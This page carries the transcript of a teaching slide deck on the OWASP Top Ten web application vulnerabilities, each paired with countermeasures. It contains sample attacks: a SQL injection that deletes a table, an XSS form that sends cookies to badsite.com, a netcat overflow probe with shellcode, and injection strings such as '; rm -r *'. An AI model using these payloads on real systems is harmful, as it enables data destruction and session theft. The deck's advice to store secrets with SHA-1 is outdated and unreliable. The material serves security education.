1 / 16

The Ten Most Critical Web Application Security Vulnerabilities

The Ten Most Critical Web Application Security Vulnerabilities. Ryan J.W Chen. Outline. OWASP Top Ten Vulnerabilities. A8 Insecure Storage. A3 Broken Authentication and Session Management. A1 Unvalidated Input. A2 Broken Access Control. A7 Improper Error Handling.

Download Presentation

The Ten Most Critical Web Application Security Vulnerabilities

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. The Ten Most CriticalWeb Application SecurityVulnerabilities Ryan J.W Chen

  2. Outline • OWASP Top Ten Vulnerabilities A8 Insecure Storage A3 Broken Authentication and Session Management A1 Unvalidated Input A2 Broken Access Control A7 Improper Error Handling A5 Buffer Overflows A6 Injection Flaws A4 Cross Site Scripting (XSS) Flaws A9 Denial of Service A10 Insecure Configuration Management

  3. Example Web Application DMZ Protected Network Internal Network Internet Browser Web Server Application Server Database Server

  4. Top Ten Vulnerabilities this year & last year

  5. A1 Unvalidated Input (1/3) • Attacker can tamper with any part of an HTTP request, includingurl, querystring, headers, cookies, form fields, and hidden field. • Related Attack • A4 Cross site Scripting • A5 Buffer Overflows • A6 Injection Flaws

  6. Manipulation What will be done? A1 Unvalidated Input (2/3) Any malicious user can see the QueryString and modify it! Example: (SQL Injection) http://www.yoursite.com/phones/phonelist.cgi?phoneid=34 http://www.yoursite.com/phones/phonelist.cgi?phoneid=34;delete from phones SELECT name, phone FROM phones WHERE phoneid=34; DELETE FROM phones

  7. A1 Unvalidated Input (3/3) • Countermeasures • Parameter should be validate before they are used. • Data type • Allow character set • Minimum and maximum length • Whether null is allowed • Whether the parameter is require or not • Whether duplicates are allowed • Numeric range

  8. A2 Broken Access Control • Access Control = Authorization • Countermeasures • Use access control matrix to define access control rules. • Administrative function can use VPN to protect. Forced browsing past access control checks Path traversal Insecure session IDs or keys Client-side caching File permissions – may allow access to config/password files

  9. A3 Broken Authentication and Session Management • Weak authentication • Countermeasures • Strong passwords • Account List protection • Session ID Protection (SSL) Password-only Trust relationships between hosts Unencrypted secrets could be sniffed Easily guessable usernames

  10. <a href= http://www.insecuresite.com/welcome.asp?name= <FORM action=http://www.badsite.com/data.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT>idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT>> here</a> A4 Cross Site Scripting (XSS) Flaws • Attacker uses a trust application/company to send malicious code to end-user. “cookie robbed!!” Source : Bo

  11. A5 Buffer Overflows • Mostly affects web/app servers • Goal: crash the target app and get a shell • Countermeasures • Keep up with bug reports • Periodically scan your website • Code reviews Example: • echo “vrfy `perl –e ‘print “a” x 1000’`” |nc www.targetsystem.com 25 • Replace this with something like this… • char shellcode[] = “\xeb\xlf\x5e\x89\x76\x08…”

  12. A6 Injection Flaws • Allows attacker to relay malicious code through a web application to another system. • Countermeasures • Avoid system calls (use libraries instead) • Validate input information. • Run with limited privileges Path traversal: “../” Add more commands: “; rm –r *” SQL injection: “’ OR 1=1”

  13. A7 Improper Error Handling • Helps attacker know how to target the application. • Countermeasures • Code review • Modify default error pages (404, 401, etc.) Example: “File not found” vs. “Access denied”

  14. Poor choice of algorithm Poor randomness Insecure storage of keys, certificates, and passwords Failure to encrypt critical data Improper storage of secrets in memory A8 Insecure Storage • Insecure storage of sensitive information. • Countermeasures • Use a one-way hash function(SHA-1) instead of storing encrypted data. • Make sure no open vulnerabilities in cryptography.

  15. A9 Denial of Service • Legitimate users can’t be serviced. • Countermeasures • Limit the sources allocated to any user to a bare minimum. • Avoid any unnecessary access to databases or other expensive resource. Exhaust the system resources Legitimate account lock out

  16. A10 Insecure Configuration Management • Developers ≠ web masters • Countermeasures • Configure all security mechanisms. • Turn off all unused services. • Set up and audit roles, permissions, and accounts. • logging and alerts. Configuration problems: Unpatched security flaws in the server software. Improper file and directory permission. Default accounts with their default passwords.

More Related